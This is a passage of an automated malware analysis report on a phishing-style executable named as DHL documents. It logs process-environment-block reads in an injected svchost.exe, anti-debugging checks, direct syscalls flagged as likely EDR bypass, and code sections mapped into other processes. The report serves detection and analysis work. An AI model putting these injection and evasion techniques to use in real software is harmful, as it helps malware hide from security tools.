Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]	1_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]	1_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]	1_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]	1_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]	1_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]	1_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]	1_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]	1_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]	1_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]	1_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]	1_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]	1_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]	1_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]	1_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]	1_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]	1_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]	1_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]	1_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]	1_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]	1_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]	1_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]	1_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]	1_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]	1_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]	1_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]	1_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]	1_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]	1_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]	1_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]	1_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]	1_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]	1_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]	1_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]	1_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]	1_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]	1_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]	1_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]	1_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]	1_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]	1_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]	1_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]	1_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]	1_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]	1_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]	1_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]	1_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]	1_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]	1_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]	1_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]	1_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov edx, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]	1_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]	1_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]	1_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]	1_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]	1_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]	1_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]	1_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]	1_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]	1_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]	1_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]	1_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]	1_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]	1_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]	1_2_03060854

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_00210B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00210B62

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001E2622
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001D083F
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D09D5 SetUnhandledExceptionFilter,	0_2_001D09D5
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001D0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\unlodctr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe protection: read write	Jump to behavior
